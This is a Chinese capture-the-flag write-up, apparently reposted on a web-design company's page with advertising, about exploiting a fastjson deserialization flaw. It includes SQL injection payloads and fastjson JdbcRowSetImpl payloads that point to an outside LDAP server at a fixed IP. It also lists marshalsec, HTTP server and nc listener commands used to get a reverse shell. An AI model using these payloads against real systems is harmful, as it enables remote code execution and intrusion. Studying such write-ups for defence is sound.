如何進(jìn)行fastjson反序列化漏洞的分析

這期內(nèi)容當(dāng)中小編將會給大家?guī)碛嘘P(guān)如何進(jìn)行fastjson反序列化漏洞的分析,文章內(nèi)容豐富且以專業(yè)的角度為大家分析和敘述,閱讀完這篇文章希望大家可以有所收獲。

10年積累的網(wǎng)站設(shè)計(jì)制作、網(wǎng)站設(shè)計(jì)經(jīng)驗(yàn),可以快速應(yīng)對客戶對網(wǎng)站的新想法和需求。提供各種問題對應(yīng)的解決方案。讓選擇我們的客戶得到更好、更有力的網(wǎng)絡(luò)服務(wù)。我雖然不認(rèn)識你,你也不認(rèn)識我。但先網(wǎng)站設(shè)計(jì)制作后付款的網(wǎng)站建設(shè)流程,更有嵊州免費(fèi)網(wǎng)站建設(shè)讓你可以放心的選擇與我們合作。

0x01:寫在前面

拿到題目后,一開始通過審計(jì)代碼發(fā)現(xiàn)代碼

如何進(jìn)行fastjson反序列化漏洞的分析

審計(jì)發(fā)現(xiàn)一個注入,dbname我們可控

嘗試注入

dbName=myapp#' and 1=2 union select name from myapp.user;#
dbName=myapp#' and 1=2 union select pwd from myapp.user;#

注入處賬戶密碼留作備用(后面思路轉(zhuǎn)變?yōu)閑xp后發(fā)現(xiàn) 上面賬號密碼沒有用)

admin

admin@Rrrr_ctf_asde

然后經(jīng)過逆向注意到導(dǎo)入了

io.swagger.annotations.ApiOperation;

發(fā)現(xiàn)是個swagger

Swagger在平時日常工作中用過是個優(yōu)秀的文檔編輯器

那么直接訪問swagger-ui.html

如何進(jìn)行fastjson反序列化漏洞的分析

這里想到swagger還有fastjson庫 可以將java對象轉(zhuǎn)換成json

19年爆出很多rce漏洞。嘗試進(jìn)行查看

網(wǎng)上查詢fastjson得知存在rce漏洞

這個文章真的寫的非常詳細(xì),可以說是手把手教學(xué)

https://github.com/CaijiOrz/fastjson-1.2.47-RCE

看到如下

如何進(jìn)行fastjson反序列化漏洞的分析

這里很符合fastjson的反序列化漏洞的json格式

如何進(jìn)行fastjson反序列化漏洞的分析

訪問得知如下

按著一步一步操作來,首先準(zhǔn)備云服務(wù)器,并將倉庫文件上傳到云服務(wù)器中。

如何進(jìn)行fastjson反序列化漏洞的分析

上傳成功以后進(jìn)行如下操作

首先進(jìn)行測試

云服務(wù)器監(jiān)聽7777端口

在靶場執(zhí)行

{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://121.36.19.222:7777/Exploit","autoCommit":true}}}

發(fā)現(xiàn)有流量回顯

那就繼續(xù)按照文檔往下做。

如何進(jìn)行fastjson反序列化漏洞的分析

Cd進(jìn)去進(jìn)行查看

修改exploit.java的ip為云服務(wù)器ip

如何進(jìn)行fastjson反序列化漏洞的分析

Javac Exploit.java編譯執(zhí)行后得到Exploit.class

繼續(xù)進(jìn)行按照如下步驟繼續(xù)執(zhí)行

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer

http://121.36.19.222/#Exploit

如何進(jìn)行fastjson反序列化漏洞的分析

執(zhí)行成功如下所示,進(jìn)行監(jiān)聽本地端口1389

如何進(jìn)行fastjson反序列化漏洞的分析

python -m SimpleHTTPServer 80

如何進(jìn)行fastjson反序列化漏洞的分析

Nc 監(jiān)聽本地的8888端口

提交payload

{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://121.36.19.222:1389/Exploit","autoCommit":true}}}

執(zhí)行后成功

如何進(jìn)行fastjson反序列化漏洞的分析

成功彈到shell ,

如何進(jìn)行fastjson反序列化漏洞的分析

執(zhí)行cat /flag可以得到如下flag

如何進(jìn)行fastjson反序列化漏洞的分析

0x02:總結(jié)

日常實(shí)戰(zhàn)中,喜歡burp帶上fastjson的檢測腳本,遇到可疑的就發(fā)包檢測一下。顯示有漏洞就嘗試payload打一下DNSlog試試回顯,再進(jìn)一步進(jìn)行深挖。

上述就是小編為大家分享的如何進(jìn)行fastjson反序列化漏洞的分析了,如果剛好有類似的疑惑,不妨參照上述分析進(jìn)行理解。如果想知道更多相關(guān)知識,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。

標(biāo)題名稱:如何進(jìn)行fastjson反序列化漏洞的分析
標(biāo)題鏈接:http://bm7419.com/article2/gigpic.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供域名注冊動態(tài)網(wǎng)站、靜態(tài)網(wǎng)站、網(wǎng)站改版、小程序開發(fā)、微信公眾號

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

成都定制網(wǎng)站建設(shè)